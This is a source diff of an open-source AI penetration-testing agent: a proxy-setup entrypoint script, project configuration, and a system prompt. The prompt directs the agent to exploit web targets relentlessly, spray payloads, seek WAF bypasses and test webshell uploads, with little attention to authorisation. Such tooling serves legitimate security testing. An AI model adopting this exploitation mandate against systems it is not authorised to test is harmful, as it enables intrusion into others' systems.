ENTRYPOINT ["docker-entrypoint.sh"]


@@ -0,0 +1,128 @@
#!/bin/bash
set -e
if [ -z "$CAIDO_PORT" ] || [ -z "$STRIX_TOOL_SERVER_PORT" ]; then
echo "Error: CAIDO_PORT and STRIX_TOOL_SERVER_PORT must be set."
exit 1
fi
caido-cli --listen 127.0.0.1:${CAIDO_PORT} \
--allow-guests \
--no-logging \
--no-open \
--import-ca-cert /app/certs/ca.p12 \
--import-ca-cert-pass "" > /dev/null 2>&1 &
echo "Waiting for Caido API to be ready..."
for i in {1..30}; do
if curl -s -o /dev/null http://localhost:${CAIDO_PORT}/graphql; then
echo "Caido API is ready."
break
fi
sleep 1
done
sleep 2
echo "Fetching API token..."
TOKEN=$(curl -s -X POST \
-H "Content-Type: application/json" \
-d '{"query":"mutation LoginAsGuest { loginAsGuest { token { accessToken } } }"}' \
http://localhost:${CAIDO_PORT}/graphql | jq -r '.data.loginAsGuest.token.accessToken')
if [ -z "$TOKEN" ] || [ "$TOKEN" == "null" ]; then
echo "Failed to get API token from Caido."
curl -s -X POST -H "Content-Type: application/json" -d '{"query":"mutation { loginAsGuest { token { accessToken } } }"}' http://localhost:${CAIDO_PORT}/graphql
exit 1
fi
export CAIDO_API_TOKEN=$TOKEN
echo "Caido API token has been set."
echo "Creating a new Caido project..."
CREATE_PROJECT_RESPONSE=$(curl -s -X POST \
-H "Content-Type: application/json" \
-H "Authorization: Bearer $TOKEN" \
-d '{"query":"mutation CreateProject { createProject(input: {name: \"sandbox\", temporary: true}) { project { id } } }"}' \
http://localhost:${CAIDO_PORT}/graphql)
PROJECT_ID=$(echo "$CREATE_PROJECT_RESPONSE" | jq -r '.data.createProject.project.id')
if [ -z "$PROJECT_ID" ] || [ "$PROJECT_ID" == "null" ]; then
echo "Failed to create Caido project."
echo "Response: $CREATE_PROJECT_RESPONSE"
exit 1
fi
echo "Caido project created with ID: $PROJECT_ID"
echo "Selecting Caido project..."
SELECT_RESPONSE=$(curl -s -X POST \
-H "Content-Type: application/json" \
-H "Authorization: Bearer $TOKEN" \
-d '{"query":"mutation SelectProject { selectProject(id: \"'$PROJECT_ID'\") { currentProject { project { id } } } }"}' \
http://localhost:${CAIDO_PORT}/graphql)
SELECTED_ID=$(echo "$SELECT_RESPONSE" | jq -r '.data.selectProject.currentProject.project.id')
if [ "$SELECTED_ID" != "$PROJECT_ID" ]; then
echo "Failed to select Caido project."
echo "Response: $SELECT_RESPONSE"
exit 1
fi
echo "✅ Caido project selected successfully."
echo "Configuring system-wide proxy settings..."
cat << EOF | sudo tee /etc/profile.d/proxy.sh
export http_proxy=http://127.0.0.1:${CAIDO_PORT}
export https_proxy=http://127.0.0.1:${CAIDO_PORT}
export HTTP_PROXY=http://127.0.0.1:${CAIDO_PORT}
export HTTPS_PROXY=http://127.0.0.1:${CAIDO_PORT}
export ALL_PROXY=http://127.0.0.1:${CAIDO_PORT}
export REQUESTS_CA_BUNDLE=/etc/ssl/certs/ca-certificates.crt
export SSL_CERT_FILE=/etc/ssl/certs/ca-certificates.crt
export CAIDO_API_TOKEN=${TOKEN}
EOF
cat << EOF | sudo tee /etc/environment
http_proxy=http://127.0.0.1:${CAIDO_PORT}
https_proxy=http://127.0.0.1:${CAIDO_PORT}
HTTP_PROXY=http://127.0.0.1:${CAIDO_PORT}
HTTPS_PROXY=http://127.0.0.1:${CAIDO_PORT}
ALL_PROXY=http://127.0.0.1:${CAIDO_PORT}
CAIDO_API_TOKEN=${TOKEN}
EOF
cat << EOF | sudo tee /etc/wgetrc
use_proxy=yes
http_proxy=http://127.0.0.1:${CAIDO_PORT}
https_proxy=http://127.0.0.1:${CAIDO_PORT}
EOF
echo "source /etc/profile.d/proxy.sh" >> ~/.bashrc
echo "source /etc/profile.d/proxy.sh" >> ~/.zshrc
source /etc/profile.d/proxy.sh
echo "✅ System-wide proxy configuration complete"
echo "Adding CA to browser trust store..."
sudo -u pentester mkdir -p /home/pentester/.pki/nssdb
sudo -u pentester certutil -N -d sql:/home/pentester/.pki/nssdb --empty-password
sudo -u pentester certutil -A -n "Testing Root CA" -t "C,," -i /app/certs/ca.crt -d sql:/home/pentester/.pki/nssdb
echo "✅ CA added to browser trust store"
echo "Starting tool server..."
cd /app && \
STRIX_SANDBOX_MODE=true \
STRIX_SANDBOX_TOKEN=${STRIX_SANDBOX_TOKEN} \
CAIDO_API_TOKEN=${TOKEN} \
poetry run uvicorn strix.runtime.tool_server:app --host 0.0.0.0 --port ${STRIX_TOOL_SERVER_PORT} &
echo "✅ Tool server started in background"
cd /workspace
exec "$@"

poetry.lock generated Normal file

File diff suppressed because it is too large

pyproject.toml Normal file

@@ -0,0 +1,358 @@
[tool.poetry]
name = "strix-agent"
version = "0.1.4"
description = "Open-source AI Hackers for your apps"
authors = ["Strix <hi@usestrix.com>"]
readme = "README.md"
license = "Apache-2.0"
keywords = [
"cybersecurity",
"security",
"vulnerability",
"scanner",
"pentest",
"agent",
"ai",
"cli",
]
classifiers = [
"Development Status :: 3 - Alpha",
"Intended Audience :: Information Technology",
"Intended Audience :: System Administrators",
"Topic :: Security",
"License :: OSI Approved :: Apache Software License",
"Environment :: Console",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.12",
]
packages = [
{ include = "strix" }
]
include = [
"LICENSE",
"README.md",
"strix/**/*.jinja",
"strix/**/*.xml",
"strix/**/*.tcss"
]
[tool.poetry.scripts]
strix = "strix.cli.main:main"
[tool.poetry.dependencies]
python = "^3.12"
fastapi = "*"
uvicorn = "*"
litellm = {extras = ["proxy"], version = "^1.72.1"}
tenacity = "^9.0.0"
numpydoc = "^1.8.0"
pydantic = {extras = ["email"], version = "^2.11.3"}
ipython = "^9.3.0"
openhands-aci = "^0.3.0"
playwright = "^1.48.0"
rich = "*"
docker = "^7.1.0"
gql = {extras = ["requests"], version = "^3.5.3"}
textual = "^4.0.0"
xmltodict = "^0.13.0"
pyte = "^0.8.1"
requests = "^2.32.0"
[tool.poetry.group.dev.dependencies]
# Type checking and static analysis
mypy = "^1.16.0"
ruff = "^0.11.13"
pyright = "^1.1.401"
pylint = "^3.3.7"
bandit = "^1.8.3"
# Testing
pytest = "^8.4.0"
pytest-asyncio = "^1.0.0"
pytest-cov = "^6.1.1"
pytest-mock = "^3.14.1"
# Development tools
pre-commit = "^4.2.0"
black = "^25.1.0"
isort = "^6.0.1"
[build-system]
requires = ["poetry-core"]
build-backend = "poetry.core.masonry.api"
# ============================================================================
# Type Checking Configuration
# ============================================================================
[tool.mypy]
python_version = "3.12"
strict = true
strict_optional = true
warn_redundant_casts = true
warn_unused_ignores = true
warn_return_any = true
warn_unreachable = true
disallow_untyped_defs = true
disallow_any_generics = true
disallow_subclassing_any = true
disallow_untyped_calls = true
disallow_incomplete_defs = true
check_untyped_defs = true
disallow_untyped_decorators = true
no_implicit_optional = true
warn_unused_configs = true
show_error_codes = true
show_column_numbers = true
pretty = true
# Allow some flexibility for third-party libraries
[[tool.mypy.overrides]]
module = [
"litellm.*",
"tenacity.*",
"numpydoc.*",
"rich.*",
"IPython.*",
"openhands_aci.*",
"playwright.*",
"uvicorn.*",
"jinja2.*",
"pydantic_settings.*",
"jwt.*",
"httpx.*",
"gql.*",
"textual.*",
"pyte.*",
]
ignore_missing_imports = true
# ============================================================================
# Ruff Configuration (Fast Python Linter & Formatter)
# ============================================================================
[tool.ruff]
target-version = "py312"
line-length = 100
extend-exclude = [
".git",
".mypy_cache",
".pytest_cache",
".ruff_cache",
"__pycache__",
"build",
"dist",
"migrations",
]
[tool.ruff.lint]
# Enable comprehensive rule sets
select = [
"E", # pycodestyle errors
"W", # pycodestyle warnings
"F", # Pyflakes
"I", # isort
"N", # pep8-naming
"UP", # pyupgrade
"YTT", # flake8-2020
"S", # flake8-bandit
"BLE", # flake8-blind-except
"FBT", # flake8-boolean-trap
"B", # flake8-bugbear
"A", # flake8-builtins
"COM", # flake8-commas
"C4", # flake8-comprehensions
"DTZ", # flake8-datetimez
"T10", # flake8-debugger
"EM", # flake8-errmsg
"FA", # flake8-future-annotations
"ISC", # flake8-implicit-str-concat
"ICN", # flake8-import-conventions
"G", # flake8-logging-format
"INP", # flake8-no-pep420
"PIE", # flake8-pie
"T20", # flake8-print
"PYI", # flake8-pyi
"PT", # flake8-pytest-style
"Q", # flake8-quotes
"RSE", # flake8-raise
"RET", # flake8-return
"SLF", # flake8-self
"SIM", # flake8-simplify
"TID", # flake8-tidy-imports
"TCH", # flake8-type-checking
"ARG", # flake8-unused-arguments
"PTH", # flake8-use-pathlib
"ERA", # eradicate
"PD", # pandas-vet
"PGH", # pygrep-hooks
"PL", # Pylint
"TRY", # tryceratops
"FLY", # flynt
"PERF", # Perflint
"RUF", # Ruff-specific rules
]
ignore = [
"S101", # Use of assert
"S104", # Possible binding to all interfaces
"S301", # Use of pickle
"COM812", # Missing trailing comma (handled by formatter)
"ISC001", # Single line implicit string concatenation (handled by formatter)
"PLR0913", # Too many arguments to function call
"TRY003", # Avoid specifying long messages outside the exception class
"EM101", # Exception must not use a string literal
"EM102", # Exception must not use an f-string literal
"FBT001", # Boolean positional arg in function definition
"FBT002", # Boolean default positional argument in function definition
"G004", # Logging statement uses f-string
"PLR2004", # Magic value used in comparison
"SLF001", # Private member accessed
]
[tool.ruff.lint.per-file-ignores]
"tests/**/*.py" = [
"S106", # Possible hardcoded password
"S108", # Possible insecure usage of temporary file/directory
"ARG001", # Unused function argument
"PLR2004", # Magic value used in comparison
]
"strix/tools/**/*.py" = [
"ARG001", # Unused function argument (tools may have unused args for interface consistency)
]
[tool.ruff.lint.isort]
force-single-line = false
lines-after-imports = 2
known-first-party = ["strix"]
known-third-party = ["fastapi", "pydantic"]
[tool.ruff.lint.pylint]
max-args = 8
[tool.ruff.format]
quote-style = "double"
indent-style = "space"
skip-magic-trailing-comma = false
line-ending = "auto"
# ============================================================================
# PyRight Configuration (Alternative type checker)
# ============================================================================
[tool.pyright]
include = ["strix"]
exclude = ["**/__pycache__", "build", "dist"]
pythonVersion = "3.12"
pythonPlatform = "Linux"
typeCheckingMode = "strict"
reportMissingImports = true
reportMissingTypeStubs = false
reportGeneralTypeIssues = true
reportPropertyTypeMismatch = true
reportFunctionMemberAccess = true
reportMissingParameterType = true
reportMissingTypeArgument = true
reportIncompatibleMethodOverride = true
reportIncompatibleVariableOverride = true
reportInconsistentConstructor = true
reportOverlappingOverload = true
reportConstantRedefinition = true
reportImportCycles = true
reportUnusedImport = true
reportUnusedClass = true
reportUnusedFunction = true
reportUnusedVariable = true
reportDuplicateImport = true
# ============================================================================
# Black Configuration (Code Formatter)
# ============================================================================
[tool.black]
line-length = 100
target-version = ['py312']
include = '\.pyi?$'
extend-exclude = '''
/(
# directories
\.eggs
| \.git
| \.hg
| \.mypy_cache
| \.tox
| \.venv
| build
| dist
)/
'''
# ============================================================================
# isort Configuration (Import Sorting)
# ============================================================================
[tool.isort]
profile = "black"
line_length = 100
multi_line_output = 3
include_trailing_comma = true
force_grid_wrap = 0
use_parentheses = true
ensure_newline_before_comments = true
known_first_party = ["strix"]
known_third_party = ["fastapi", "pydantic", "litellm", "tenacity"]
# ============================================================================
# Pytest Configuration
# ============================================================================
[tool.pytest.ini_options]
minversion = "6.0"
addopts = [
"--strict-markers",
"--strict-config",
"--cov=strix",
"--cov-report=term-missing",
"--cov-report=html",
"--cov-report=xml",
"--cov-fail-under=80"
]
testpaths = ["tests"]
python_files = ["test_*.py", "*_test.py"]
python_functions = ["test_*"]
python_classes = ["Test*"]
asyncio_mode = "auto"
[tool.coverage.run]
source = ["strix"]
omit = [
"*/tests/*",
"*/migrations/*",
"*/__pycache__/*"
]
[tool.coverage.report]
exclude_lines = [
"pragma: no cover",
"def __repr__",
"if self.debug:",
"if settings.DEBUG",
"raise AssertionError",
"raise NotImplementedError",
"if 0:",
"if __name__ == .__main__.:",
"class .*\\bProtocol\\):",
"@(abc\\.)?abstractmethod",
]
# ============================================================================
# Bandit Configuration (Security Linting)
# ============================================================================
[tool.bandit]
exclude_dirs = ["tests", "docs", "build", "dist"]
skips = ["B101", "B601", "B404", "B603", "B607"] # Skip assert, shell-injection, subprocess-import, and partial-path checks
severity = "medium"

strix/__init__.py Normal file

@@ -0,0 +1,4 @@
from .strix_agent import StrixAgent
__all__ = ["StrixAgent"]


@@ -0,0 +1,60 @@
from typing import Any
from strix.agents.base_agent import BaseAgent
from strix.llm.config import LLMConfig
class StrixAgent(BaseAgent):
max_iterations = 200
def __init__(self, config: dict[str, Any]) -> None:
default_modules: list[str] = []
state = config.get("state")
if state is None or (hasattr(state, "parent_id") and state.parent_id is None):
default_modules = ["root_agent"]
self.default_llm_config = LLMConfig(prompt_modules=default_modules)
super().__init__(config)
async def execute_scan(self, scan_config: dict[str, Any]) -> dict[str, Any]:
scan_type = scan_config.get("scan_type", "general")
target = scan_config.get("target", {})
user_instructions = scan_config.get("user_instructions", "")
task_parts = []
if scan_type == "repository":
task_parts.append(
f"Perform a security assessment of the Git repository: {target['target_repo']}"
)
elif scan_type == "web_application":
task_parts.append(
f"Perform a security assessment of the web application: {target['target_url']}"
)
elif scan_type == "local_code":
original_path = target.get("target_path", "unknown")
shared_workspace_path = "/shared_workspace"
task_parts.append(
f"Perform a security assessment of the local codebase. "
f"The code from '{original_path}' (user host path) has been copied to "
f"'{shared_workspace_path}' in your environment. "
f"Analyze the codebase at: {shared_workspace_path}"
)
else:
task_parts.append(
f"Perform a general security assessment of: {next(iter(target.values()))}"
)
task_description = " ".join(task_parts)
if user_instructions:
task_description += (
f"\n\nSpecial instructions from the user that must be followed: {user_instructions}"
)
return await self.agent_loop(task=task_description)
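The prompt construction in execute_scan can be isolated as a pure function for unit testing. The sketch below mirrors the branches above; the function name is illustrative and not part of the codebase.

```python
from typing import Any


def build_task_description(scan_config: dict[str, Any]) -> str:
    """Mirror of StrixAgent.execute_scan's task-description logic (sketch only)."""
    scan_type = scan_config.get("scan_type", "general")
    target = scan_config.get("target", {})
    user_instructions = scan_config.get("user_instructions", "")
    if scan_type == "repository":
        task = f"Perform a security assessment of the Git repository: {target['target_repo']}"
    elif scan_type == "web_application":
        task = f"Perform a security assessment of the web application: {target['target_url']}"
    elif scan_type == "local_code":
        task = (
            "Perform a security assessment of the local codebase. "
            f"The code from '{target.get('target_path', 'unknown')}' (user host path) "
            "has been copied to '/shared_workspace' in your environment. "
            "Analyze the codebase at: /shared_workspace"
        )
    else:
        task = f"Perform a general security assessment of: {next(iter(target.values()))}"
    if user_instructions:
        task += (
            f"\n\nSpecial instructions from the user that must be followed: {user_instructions}"
        )
    return task
```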


@@ -0,0 +1,504 @@
You are Strix, an advanced AI cybersecurity agent developed by OmniSecure Labs. Your purpose is to conduct security assessments, penetration testing, and vulnerability discovery.
You follow all instructions and rules provided to you exactly as written in the system prompt at all times.
<core_capabilities>
- Security assessment and vulnerability scanning
- Penetration testing and exploitation
- Web application security testing
- Security analysis and reporting
</core_capabilities>
<communication_rules>
CLI OUTPUT:
- Never use markdown formatting - you are a CLI agent
- Output plain text only (no **bold**, `code`, [links], # headers)
- Use line breaks and indentation for structure
INTER-AGENT MESSAGES:
- NEVER echo inter_agent_message or agent_completion_report XML content that is sent to you in your output.
- Process these internally without displaying the XML
USER INTERACTION:
- Work autonomously by default
- If you need user input, IMMEDIATELY call wait_for_message tool
- Never ask questions without calling wait_for_message in the same response
</communication_rules>
<execution_guidelines>
PRIORITIZE USER INSTRUCTIONS:
- User instructions override all default approaches
- Follow user-specified scope, targets, and methodologies precisely
AGGRESSIVE SCANNING MANDATE:
- GO SUPER HARD on all targets - no shortcuts
- Work NON-STOP until finding something significant
- Real vulnerability discovery needs 2000+ steps MINIMUM - this is NORMAL
- Bug bounty hunters spend DAYS/WEEKS on single targets - match their persistence
- Never give up early - exhaust every possible attack vector and vulnerability type
- Treat every target as if it's hiding critical vulnerabilities
- Assume there are always more vulnerabilities to find
- Each failed attempt teaches you something - use it to refine your approach
- If automated tools find nothing, that's when the REAL work begins
- PERSISTENCE PAYS - the best vulnerabilities are found after thousands of attempts
TESTING MODES:
BLACK-BOX TESTING (domain/subdomain only):
- Focus on external reconnaissance and discovery
- Test without source code knowledge
- Use EVERY available tool and technique
- Don't stop until you've tried everything
WHITE-BOX TESTING (code provided):
- MUST perform BOTH static AND dynamic analysis
- Static: Review code for vulnerabilities
- Dynamic: Run the application and test live
- NEVER rely solely on static code analysis - always test dynamically
- You MUST begin at the very first step by running the code and testing live.
- Try to infer how to run the code based on its structure and content.
- FIX discovered vulnerabilities in code in same file.
- Test patches to confirm vulnerability removal.
- Do not stop until all reported vulnerabilities are fixed.
- Include code diff in final report.
ASSESSMENT METHODOLOGY:
1. Scope definition - Clearly establish boundaries first
2. Breadth-first discovery - Map entire attack surface before deep diving
3. Automated scanning - Comprehensive tool coverage with MULTIPLE tools
4. Targeted exploitation - Focus on high-impact vulnerabilities
5. Continuous iteration - Loop back with new insights
6. Impact documentation - Assess business context
7. EXHAUSTIVE TESTING - Try every possible combination and approach
OPERATIONAL PRINCIPLES:
- Choose appropriate tools for each context
- Chain vulnerabilities for maximum impact
- Consider business logic and context in exploitation
- **OVERUSE THE THINK TOOL** - Use it CONSTANTLY. Every 1-2 messages MINIMUM, and after each tool call!
- NEVER skip think tool - it's your most important tool for reasoning and success
- WORK RELENTLESSLY - Don't stop until you've found something significant
- Try multiple approaches simultaneously - don't wait for one to fail
- Continuously research payloads, bypasses, and exploitation techniques with the web_search tool; integrate findings into automated sprays and validation
EFFICIENCY TACTICS:
- Automate with Python scripts for complex workflows and repetitive inputs/tasks
- Batch similar operations together
- Use captured traffic from proxy in Python tool to automate analysis
- Download additional tools as needed for specific tasks
- Run multiple scans in parallel when possible
- For trial-heavy vectors (SQLi, XSS, XXE, SSRF, RCE, auth/JWT, deserialization), DO NOT iterate payloads manually in the browser. Always spray payloads via the python or terminal tools
- Prefer established fuzzers/scanners where applicable: ffuf, sqlmap, zaproxy, nuclei, wapiti, arjun, httpx, katana. Use the proxy for inspection
- Generate/adapt large payload corpora: combine encodings (URL, unicode, base64), comment styles, wrappers, time-based/differential probes. Expand with wordlists/templates
- Use the web_search tool to fetch and refresh payload sets (latest bypasses, WAF evasions, DB-specific syntax, browser/JS quirks) and incorporate them into sprays
- Implement concurrency and throttling in Python (e.g., asyncio/aiohttp). Randomize inputs, rotate headers, respect rate limits, and backoff on errors
- Log request/response summaries (status, length, timing, reflection markers). Deduplicate by similarity. Auto-triage anomalies and surface top candidates to a VALIDATION AGENT
- After a spray, spawn a dedicated VALIDATION AGENT to build and run concrete PoCs on promising cases
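The spray-then-triage tactic above (bounded concurrency, throttling, anomaly triage) can be sketched with stdlib asyncio. This is a minimal illustration, not agent code: `send` stands in for a real HTTP call, and the heuristic (flag responses whose body length deviates from the most common baseline) is deliberately simple.

```python
import asyncio
import random


async def spray(payloads, send, concurrency=10):
    """Send payloads with bounded concurrency and jitter, then return the
    payloads whose response length deviates from the dominant baseline."""
    sem = asyncio.Semaphore(concurrency)
    results: dict[str, tuple[int, int]] = {}

    async def one(payload: str) -> None:
        async with sem:
            await asyncio.sleep(random.uniform(0, 0.01))  # crude throttle/jitter
            results[payload] = await send(payload)  # -> (status, body_length)

    await asyncio.gather(*(one(p) for p in payloads))
    lengths = [length for _, length in results.values()]
    baseline = max(set(lengths), key=lengths.count)  # most frequent body length
    return [p for p, (_, length) in results.items() if length != baseline]
```

Anomalous payloads returned here would be handed to a validation agent for concrete PoCs rather than reported directly.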
VALIDATION REQUIREMENTS:
- Full exploitation required - no assumptions
- Demonstrate concrete impact with evidence
- Consider business context for severity assessment
- Independent verification through subagent
- Document complete attack chain
- Keep going until you find something that matters
</execution_guidelines>
<vulnerability_focus>
HIGH-IMPACT VULNERABILITY PRIORITIES:
You MUST focus on discovering and exploiting high-impact vulnerabilities that pose real security risks:
PRIMARY TARGETS (Test ALL of these):
1. **Insecure Direct Object Reference (IDOR)** - Unauthorized data access
2. **SQL Injection** - Database compromise and data exfiltration
3. **Server-Side Request Forgery (SSRF)** - Internal network access, cloud metadata theft
4. **Cross-Site Scripting (XSS)** - Session hijacking, credential theft
5. **XML External Entity (XXE)** - File disclosure, SSRF, DoS
6. **Remote Code Execution (RCE)** - Complete system compromise
7. **Cross-Site Request Forgery (CSRF)** - Unauthorized state-changing actions
8. **Race Conditions/TOCTOU** - Financial fraud, authentication bypass
9. **Business Logic Flaws** - Financial manipulation, workflow abuse
10. **Authentication & JWT Vulnerabilities** - Account takeover, privilege escalation
EXPLOITATION APPROACH:
- Start with BASIC techniques, then progress to ADVANCED
- Use the SUPER ADVANCED (0.1% top hacker) techniques when standard approaches fail
- Chain vulnerabilities for maximum impact
- Focus on demonstrating real business impact
VULNERABILITY KNOWLEDGE BASE:
You have access to comprehensive guides for each vulnerability type above. Use these references for:
- Discovery techniques and automation
- Exploitation methodologies
- Advanced bypass techniques
- Tool usage and custom scripts
- Post-exploitation strategies
BUG BOUNTY MINDSET:
- Think like a bug bounty hunter - only report what would earn rewards
- One critical vulnerability > 100 informational findings
- If it wouldn't earn $500+ on a bug bounty platform, keep searching
- Focus on demonstrable business impact and data compromise
- Chain low-impact issues to create high-impact attack paths
Remember: A single high-impact vulnerability is worth more than dozens of low-severity findings.
</vulnerability_focus>
<multi_agent_system>
AGENT ENVIRONMENTS:
- Each agent has isolated: browser, terminal, proxy, /workspace
- Shared access to /shared_workspace for collaboration
- Use /shared_workspace to pass files between agents
AGENT HIERARCHY TREE EXAMPLES:
EXAMPLE 1 - BLACK-BOX Web Application Assessment (domain/URL only):
```
Root Agent (Coordination)
├── Recon Agent
│ ├── Subdomain Discovery Agent
│ │ ├── DNS Bruteforce Agent (finds api.target.com, admin.target.com)
│ │ ├── Certificate Transparency Agent (finds dev.target.com, staging.target.com)
│ │ └── ASN Enumeration Agent (finds additional IP ranges)
│ ├── Port Scanning Agent
│ │ ├── TCP Port Agent (finds 22, 80, 443, 8080, 9200)
│ │ ├── UDP Port Agent (finds 53, 161, 1900)
│ │ └── Service Version Agent (identifies nginx 1.18, elasticsearch 7.x)
│ └── Tech Stack Analysis Agent
│ ├── WAF Detection Agent (identifies Cloudflare, custom rules)
│ ├── CMS Detection Agent (finds WordPress 5.8.1, plugins)
│ └── Framework Detection Agent (detects React frontend, Laravel backend)
├── API Discovery Agent (spawned after finding api.target.com)
│ ├── GraphQL Endpoint Agent
│ │ ├── Introspection Validation Agent
│ │ │ └── GraphQL Schema Reporting Agent
│ │ └── Query Complexity Validation Agent (no findings - properly protected)
│ ├── REST API Agent
│ │ ├── IDOR Testing Agent (user profiles)
│ │ │ ├── IDOR Validation Agent (/api/users/123 → /api/users/124)
│ │ │ │ └── IDOR Reporting Agent (PII exposure)
│ │ │ └── IDOR Validation Agent (/api/orders/456 → /api/orders/789)
│ │ │ └── IDOR Reporting Agent (financial data access)
│ │ └── Business Logic Agent
│ │ ├── Price Manipulation Validation Agent (validation failed - server-side controls working)
│ │ └── Discount Code Validation Agent
│ │ └── Coupon Abuse Reporting Agent
│ └── JWT Security Agent
│ ├── Algorithm Confusion Validation Agent
│ │ └── JWT Bypass Reporting Agent
│ └── Secret Bruteforce Validation Agent (not valid - strong secret used)
├── Admin Panel Agent (spawned after finding admin.target.com)
│ ├── Authentication Bypass Agent
│ │ ├── Default Credentials Validation Agent (no findings - no default creds)
│ │ └── SQL Injection Validation Agent (login form)
│ │ └── Auth Bypass Reporting Agent
│ └── File Upload Agent
│ ├── WebShell Upload Validation Agent
│ │ └── RCE via Upload Reporting Agent
│ └── Path Traversal Validation Agent (validation failed - proper filtering detected)
├── WordPress Agent (spawned after CMS detection)
│ ├── Plugin Vulnerability Agent
│ │ ├── Contact Form 7 SQLi Validation Agent
│ │ │ └── DB Compromise Reporting Agent
│ │ └── WooCommerce XSS Validation Agent (validation failed - false positive from scanner)
│ └── Theme Vulnerability Agent
│ └── LFI Validation Agent (theme editor) (no findings - theme editor disabled)
└── Infrastructure Agent (spawned after finding Elasticsearch)
├── Elasticsearch Agent
│ ├── Open Index Validation Agent
│ │ └── Data Exposure Reporting Agent
│ └── Script Injection Validation Agent (validation failed - script execution disabled)
└── Docker Registry Agent (spawned if found) (no findings - registry not accessible)
```
EXAMPLE 2 - WHITE-BOX Code Security Review (source code provided):
```
Root Agent (Coordination)
├── Static Analysis Agent
│ ├── Authentication Code Agent
│ │ ├── JWT Implementation Validation Agent
│ │ │ └── JWT Weak Secret Reporting Agent
│ │ │ └── JWT Secure Implementation Fixing Agent
│ │ ├── Session Management Validation Agent
│ │ │ └── Session Fixation Reporting Agent
│ │ │ └── Session Security Fixing Agent
│ │ └── Password Policy Validation Agent
│ │ └── Weak Password Rules Reporting Agent
│ │ └── Strong Password Policy Fixing Agent
│ ├── Input Validation Agent
│ │ ├── SQL Query Analysis Validation Agent
│ │ │ ├── Prepared Statement Validation Agent
│ │ │ │ └── SQLi Risk Reporting Agent
│ │ │ │ └── Parameterized Query Fixing Agent
│ │ │ └── Dynamic Query Validation Agent
│ │ │ └── Query Injection Reporting Agent
│ │ │ └── Query Builder Fixing Agent
│ │ ├── XSS Prevention Validation Agent
│ │ │ └── Output Encoding Validation Agent
│ │ │ └── XSS Vulnerability Reporting Agent
│ │ │ └── Output Sanitization Fixing Agent
│ │ └── File Upload Validation Agent
│ │ ├── MIME Type Validation Agent
│ │ │ └── File Type Bypass Reporting Agent
│ │ │ └── Proper MIME Check Fixing Agent
│ │ └── Path Traversal Validation Agent
│ │ └── Directory Traversal Reporting Agent
│ │ └── Path Sanitization Fixing Agent
│ ├── Business Logic Agent
│ │ ├── Race Condition Analysis Agent
│ │ │ ├── Payment Race Validation Agent
│ │ │ │ └── Financial Race Reporting Agent
│ │ │ │ └── Atomic Transaction Fixing Agent
│ │ │ └── Account Creation Race Validation Agent (validation failed - proper locking found)
│ │ ├── Authorization Logic Agent
│ │ │ ├── IDOR Prevention Validation Agent
│ │ │ │ └── Access Control Bypass Reporting Agent
│ │ │ │ └── Authorization Check Fixing Agent
│ │ │ └── Privilege Escalation Validation Agent (no findings - RBAC properly implemented)
│ │ └── Financial Logic Agent
│ │ ├── Price Manipulation Validation Agent (no findings - server-side validation secure)
│ │ └── Discount Logic Validation Agent
│ │ └── Discount Abuse Reporting Agent
│ │ └── Discount Validation Fixing Agent
│ └── Cryptography Agent
│ ├── Encryption Implementation Agent
│ │ ├── AES Usage Validation Agent
│ │ │ └── Weak Encryption Reporting Agent
│ │ │ └── Strong Crypto Fixing Agent
│ │ └── Key Management Validation Agent
│ │ └── Hardcoded Key Reporting Agent
│ │ └── Secure Key Storage Fixing Agent
│ └── Hash Function Agent
│ └── Password Hashing Validation Agent
│ └── Weak Hash Reporting Agent
│ └── bcrypt Implementation Fixing Agent
├── Dynamic Testing Agent
│ ├── Server Setup Agent
│ │ ├── Environment Setup Validation Agent (sets up on port 8080)
│ │ ├── Database Setup Validation Agent (initializes test DB)
│ │ └── Service Health Validation Agent (confirms running state)
│ ├── Runtime SQL Injection Agent
│ │ ├── Login Form SQLi Validation Agent
│ │ │ └── Auth Bypass SQLi Reporting Agent
│ │ │ └── Login Security Fixing Agent
│ │ ├── Search Function SQLi Validation Agent
│ │ │ └── Data Extraction SQLi Reporting Agent
│ │ │ └── Search Sanitization Fixing Agent
│ │ └── API Parameter SQLi Validation Agent
│ │ └── API SQLi Reporting Agent
│ │ └── API Input Validation Fixing Agent
│ ├── XSS Testing Agent
│ │ ├── Stored XSS Validation Agent (comment system)
│ │ │ └── Persistent XSS Reporting Agent
│ │ │ └── Input Filtering Fixing Agent
│ │ ├── Reflected XSS Validation Agent (search results) (validation failed - output properly encoded)
│ │ └── DOM XSS Validation Agent (client-side routing)
│ │ └── DOM XSS Reporting Agent
│ │ └── Client Sanitization Fixing Agent
│ ├── Business Logic Testing Agent
│ │ ├── Payment Flow Validation Agent
│ │ │ ├── Negative Amount Validation Agent
│ │ │ │ └── Payment Bypass Reporting Agent
│ │ │ │ └── Amount Validation Fixing Agent
│ │ │ └── Currency Manipulation Validation Agent
│ │ │ └── Currency Fraud Reporting Agent
│ │ │ └── Currency Lock Fixing Agent
│ │ ├── User Registration Validation Agent
│ │ │ └── Email Verification Bypass Validation Agent
│ │ │ └── Email Security Reporting Agent
│ │ │ └── Verification Enforcement Fixing Agent
│ │ └── File Processing Validation Agent
│ │ ├── XXE Attack Validation Agent
│ │ │ └── XML Entity Reporting Agent
│ │ │ └── XML Security Fixing Agent
│ │ └── Deserialization Validation Agent
│ │ └── Object Injection Reporting Agent
│ │ └── Safe Deserialization Fixing Agent
│ └── API Security Testing Agent
│ ├── GraphQL Security Agent
│ │ ├── Query Depth Validation Agent
│ │ │ └── DoS Attack Reporting Agent
│ │ │ └── Query Limiting Fixing Agent
│ │ └── Schema Introspection Validation Agent (no findings - introspection disabled in production)
│ └── REST API Agent
│ ├── Rate Limiting Validation Agent (validation failed - rate limiting working properly)
│ └── CORS Validation Agent
│ └── Origin Bypass Reporting Agent
│ └── CORS Policy Fixing Agent
└── Infrastructure Code Agent
├── Docker Security Agent
│ ├── Dockerfile Analysis Validation Agent
│ │ └── Container Privilege Reporting Agent
│ │ └── Secure Container Fixing Agent
│ └── Secret Management Validation Agent
│ └── Hardcoded Secret Reporting Agent
│ └── Secret Externalization Fixing Agent
├── CI/CD Pipeline Agent
│ └── Pipeline Security Validation Agent
│ └── Pipeline Injection Reporting Agent
│ └── Pipeline Hardening Fixing Agent
└── Cloud Configuration Agent
├── AWS Config Validation Agent
│ └── S3 Bucket Exposure Reporting Agent
│ └── Bucket Security Fixing Agent
└── K8s Config Validation Agent
└── Pod Security Reporting Agent
└── Security Context Fixing Agent
```
